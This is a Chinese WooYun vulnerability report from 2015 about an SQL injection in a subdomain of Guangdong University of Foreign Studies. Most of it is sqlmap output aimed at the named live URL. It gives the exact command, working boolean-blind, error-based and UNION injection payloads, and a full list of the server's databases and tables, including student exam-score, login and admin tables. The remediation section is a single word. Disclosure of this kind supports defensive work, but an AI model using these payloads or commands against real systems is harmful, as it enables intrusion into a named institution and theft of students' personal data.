漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
广东外语外贸大学的一个分站存在SQL注入点
详细说明:
广东外语外贸大学的一个分站存在SQL注入点,可导致信息泄露
漏洞证明:
注入点:http://ncre.gdufs.edu.cn/view.aspx?id=27
证明:
sqlmap -u "http://ncre.gdufs.edu.cn/view.aspx?id=27" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-7517db7}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:09:58
[20:09:58] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:09:58] [INFO] testing connection to the target URL
[20:10:28] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:10:28] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[20:10:32] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27' AND 1652=1652 AND 'upYC'='upYC
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=27' AND 7275=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7275=7275) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113))) AND 'yuvH'='yuvH
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=27' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(77)+CHAR(117)+CHAR(90)+CHAR(74)+CHAR(85)+CHAR(84)+CHAR(71)+CHAR(103)+CHAR(85)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113)--
---
[20:10:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[20:10:32] [INFO] fetching database names
[20:10:33] [INFO] fetching tables for databases: FailureMis, NetworkCenter, ReportServer, ReportServerTempDB, bks, jsj, master, model, msdb, mysite_database, tempdb, test_bak, testcenter, testcenter_tmp
[20:10:33] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:10:35] [INFO] the SQL query used returns 6 entries
[20:10:41] [INFO] the SQL query used returns 6 entries
[20:10:41] [INFO] retrieved: dbo.ChunkData
[20:10:42] [INFO] retrieved: dbo.ExecutionCache
[20:10:43] [INFO] retrieved: dbo.PersistedStream
[20:10:44] [INFO] retrieved: dbo.SessionData
[20:10:44] [INFO] retrieved: dbo.SessionLock
[20:10:45] [INFO] retrieved: dbo.SnapshotData
[20:10:53] [INFO] the SQL query used returns 27 entries
[20:11:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:11:43] [INFO] the SQL query used returns 27 entries
[20:11:44] [INFO] retrieved: dbo.ActiveSubscriptions
[20:11:44] [INFO] retrieved: dbo.Batch
[20:11:45] [INFO] retrieved: dbo.CachePolicy
[20:12:15] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:12:17] [INFO] retrieved: dbo.Catalog
[20:12:18] [INFO] retrieved: dbo.ChunkData
[20:12:18] [INFO] retrieved: dbo.ConfigurationInfo
[20:12:19] [INFO] retrieved: dbo.DataSource
[20:12:21] [INFO] retrieved: dbo.Event
[20:12:21] [INFO] retrieved: dbo.ExecutionLog
[20:12:22] [INFO] retrieved: dbo.History
[20:12:23] [INFO] retrieved: dbo.Keys
[20:12:23] [INFO] retrieved: dbo.ModelDrill
[20:12:24] [INFO] retrieved: dbo.ModelItemPolicy
[20:12:26] [INFO] retrieved: dbo.ModelPerspective
[20:12:27] [INFO] retrieved: dbo.Notifications
[20:12:27] [INFO] retrieved: dbo.Policies
[20:12:29] [INFO] retrieved: dbo.PolicyUserRole
[20:12:30] [INFO] retrieved: dbo.ReportSchedule
[20:13:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:13:02] [INFO] retrieved: dbo.Roles
[20:13:02] [INFO] retrieved: dbo.RunningJobs
[20:13:03] [INFO] retrieved: dbo.Schedule
[20:13:04] [INFO] retrieved: dbo.SecData
[20:13:07] [INFO] retrieved: dbo.ServerParametersInstance
[20:13:07] [INFO] retrieved: dbo.SnapshotData
[20:13:08] [INFO] retrieved: dbo.Subscriptions
[20:13:09] [INFO] retrieved: dbo.UpgradeInfo
[20:13:10] [INFO] retrieved: dbo.Users
[20:13:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:14:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
Database: ReportServerTempDB
[6 tables]
+---------------------------------------------------+
| ChunkData |
| ExecutionCache |
| PersistedStream |
| SessionData |
| SessionLock |
| SnapshotData |
+---------------------------------------------------+
Database: tempdb
[4 tables]
+---------------------------------------------------+
| #0BC6C43E |
| #31EC6D26 |
| #32E0915F |
| #60B24907 |
+---------------------------------------------------+
Database: NetworkCenter
[7 tables]
+---------------------------------------------------+
| Article |
| Class |
| Template |
| UpTime |
| User |
| UserCount |
| sysdiagrams |
+---------------------------------------------------+
Database: testcenter
[67 tables]
+---------------------------------------------------+
| View_1 |
| a_temp |
| a_tmp |
| a_tmp1 |
| a_tmp2 |
| adminaction |
| admininfo |
| badminton |
| badminton_1 |
| badminton_2 |
| cet4_signinfo |
| cet4_testscore |
| cet6_signinfo |
| cet6_testscore |
| cet_condition1 |
| cet_condition2 |
| cet_signinfo_out |
| cet_signinfo_tmp |
| cet_testscore_import |
| cet_testscore_temp |
| get_signinfo |
| get_signinfo1 |
| get_testscore |
| logininfo |
| logininfoget |
| logininfotem |
| monitor_grade_score |
| monitor_grade_times |
| monitor_major |
| monitor_para_grade |
| monitor_para_period |
| monitor_testroom |
| monitorcondition |
| monitorlist |
| monitorsign |
| monitorsign_history |
| monitorstaff |
| parameterinfo |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| post_reg |
| post_test |
| pre_signinfo |
| search_testroom |
| studentinfo |
| studentinfo_get |
| studentinfo_log |
| studentinfo_special |
| studentinfo_tmp |
| studentinfo_update |
| tem_condition1 |
| tem_condition2 |
| tem_signinfo |
| tem_testscore |
| test_sys_user |
| test_version_control |
| testclassroominfo |
| testinfo |
| testmajorinfo |
| testpic |
| tests |
| testviolation |
| updateinfo |
| updateinfo1 |
+---------------------------------------------------+
Database: mysite_database
[192 tables]
+---------------------------------------------------+
| PE_AdZone |
| PE_Address |
| PE_Admin |
| PE_AdminProfile |
| PE_AdminShortCutContent |
| PE_Admin_Roles |
| PE_Advertisement |
| PE_Author |
| PE_Bank |
| PE_BankrollItem |
| PE_Cards |
| PE_Client |
| PE_ClientAnnal |
| PE_ClientAssist |
| PE_ClientConfirm |
| PE_ClientHistory |
| PE_ClientHistoryItem |
| PE_ClientItem |
| PE_CollectionExclosion |
| PE_CollectionFieldRules |
| PE_CollectionFilterRules |
| PE_CollectionHistory |
| PE_CollectionItem |
| PE_CollectionListRules |
| PE_CollectionPagingRules |
| PE_Comment |
| PE_CommentPK |
| PE_CommonModel |
| PE_CommonProduct |
| PE_Company |
| PE_ComplainItem |
| PE_Contacter |
| PE_ContentCharge |
| PE_ContentPermission |
| PE_CorrelativeItems |
| PE_Coupon |
| PE_CouponItem |
| PE_Courier |
| PE_D_ProductSuite |
| PE_DeliverCharge |
| PE_DeliverItem |
| PE_DeliverItemDetails |
| PE_DeliverType |
| PE_Department |
| PE_Department_Members |
| PE_Dictionary |
| PE_DownServer |
| PE_DownloadError |
| PE_Favorite |
| PE_Files |
| PE_FlowProcess |
| PE_Friend |
| PE_GroupFieldPermissions |
| PE_GroupNodePermissions |
| PE_GroupSpecialCategoryPermissions |
| PE_GroupSpecialPermissions |
| PE_IncludeFile |
| PE_Indent |
| PE_IndentItem |
| PE_InfoFileRelation |
| PE_InfoNextProcessRoles |
| PE_InvoiceItem |
| PE_KeywordRelationShip |
| PE_Keywords |
| PE_Log |
| PE_MailList |
| PE_MailList_SubscriptionItem |
| PE_Message |
| PE_Model |
| PE_ModelTemplates |
| PE_Model_FilterField |
| PE_Mood |
| PE_MoodScheme |
| PE_Nodes |
| PE_Nodes_Model_Template |
| PE_Nodes_Template |
| PE_OrderFeedback |
| PE_OrderHistory |
| PE_OrderHistoryItem |
| PE_OrderItem |
| PE_Orders |
| PE_OutOfStockLog |
| PE_PC_PreConsultation |
| PE_PC_PreConsultationReply |
| PE_PM_CommissionDetail |
| PE_PM_GatheringDetail |
| PE_PM_Promotion |
| PE_PM_PromotionOrder |
| PE_PM_RegisterPromotion |
| PE_PM_UserAccount |
| PE_Package |
| PE_PayPlatForm |
| PE_PaymentLog |
| PE_PaymentType |
| PE_PointLog |
| PE_Present |
| PE_PresentProject |
| PE_ProcessStatusCode |
| PE_Process_Roles |
| PE_Producer |
| PE_ProductData |
| PE_ProductPrice |
| PE_Provider |
| PE_RedirectCategory |
| PE_RedirectUrl |
| PE_Region |
| PE_RemindItem |
| PE_Role_Field_Permissions |
| PE_Role_Node_Permissions |
| PE_Role_Special_Permissions |
| PE_Roles |
| PE_Roles_Permissions |
| PE_Roles_ScopePermissions |
| PE_ScreenShot |
| PE_SendBack |
| PE_SendBackItem |
| PE_ServiceItem |
| PE_ShoppingCarts |
| PE_SigninContent |
| PE_SigninLog |
| PE_Source |
| PE_SpecialCategory |
| PE_SpecialInfos |
| PE_Specials |
| PE_StatAddress |
| PE_StatBrowser |
| PE_StatColor |
| PE_StatDay |
| PE_StatInfoList |
| PE_StatIp |
| PE_StatIpInfo |
| PE_StatKeyword |
| PE_StatMonth |
| PE_StatMozilla |
| PE_StatOnline |
| PE_StatRefer |
| PE_StatScreen |
| PE_StatSystem |
| PE_StatTimezone |
| PE_StatVisit |
| PE_StatVisitor |
| PE_StatWeburl |
| PE_StatWeek |
| PE_StatYear |
| PE_Status |
| PE_Stock |
| PE_StockItem |
| PE_SubscriptionItems |
| PE_Survey |
| PE_SurveyVote |
| PE_Trademark |
| PE_TransferLog |
| PE_U_Announce |
| PE_U_Article |
| PE_U_Audio |
| PE_U_Book |
| PE_U_Camera |
| PE_U_Card |
| PE_U_Clothing |
| PE_U_CompanyText |
| PE_U_Computer |
| PE_U_Cosmetic |
| PE_U_FriendSite |
| PE_U_GuestBook |
| PE_U_Mobile |
| PE_U_OrderText |
| PE_U_Photo |
| PE_U_PortableComputer |
| PE_U_Product |
| PE_U_RedirectLink |
| PE_U_Soft |
| PE_U_UserText |
| PE_UserExpLog |
| PE_UserGroups |
| PE_UserHitHistory |
| PE_Users |
| PE_VT_UserVoteTotal |
| PE_VT_Vote |
| PE_VT_VoteItem |
| PE_ValidLog |
| PE_Version |
| PE_Vote |
| PE_Wap_Article |
| PE_Wap_Category |
| PE_Wap_Token |
| PE_WordReplaceItem |
| PE_Work |
| PE_WorkCategory |
| PE_WorkCategoryCustomForm |
| PE_WorkFlows |
| PE_WorkNextProcessRoles |
| PE_Zone_Advertisement |
+---------------------------------------------------+
Database: jsj
[14 tables]
+---------------------------------------------------+
| D99_CMD |
| D99_REG |
| D99_Tmp |
| S3_Tmp |
| WCRTEMP00023 |
| WCRTEMP00024 |
| dtest |
| pangolin_test_table |
| sqlmapoutput |
| syscommand |
| systemc |
| t_news |
| t_xz |
| xusers |
+---------------------------------------------------+
Database: ReportServer
[27 tables]
+---------------------------------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| Catalog |
| ChunkData |
| ConfigurationInfo |
| DataSource |
| Event |
| ExecutionLog |
| History |
| Keys |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| ServerParametersInstance |
| SnapshotData |
| Subscriptions |
| UpgradeInfo |
| Users |
+---------------------------------------------------+
Database: master
[306 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| adminaction |
| admininfo |
| cet4_signinfo |
| cet4_testscore |
| cet6_signinfo |
| cet6_testscore |
| logininfo |
| parameterinfo |
| pre_signinfo |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| studentinfo |
| testclassroominfo |
| testinfo |
| testmajorinfo |
| testviolation |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
Database: bks
[5 tables]
+---------------------------------------------------+
| CATEGORIES |
| FAILREPORTS |
| LOGINLOGS |
| MANAGER |
| sysdiagrams |
+---------------------------------------------------+
Database: FailureMis
[5 tables]
+---------------------------------------------------+
| AspNet_SqlCacheTablesForChangeNotification |
| FAILREPORTS |
| LOGINLOGS |
| MANAGER |
| sysdiagrams |
+---------------------------------------------------+
修复方案:
过滤
版权声明:转载请注明来源 漩涡鸣人@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-11 12:44
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无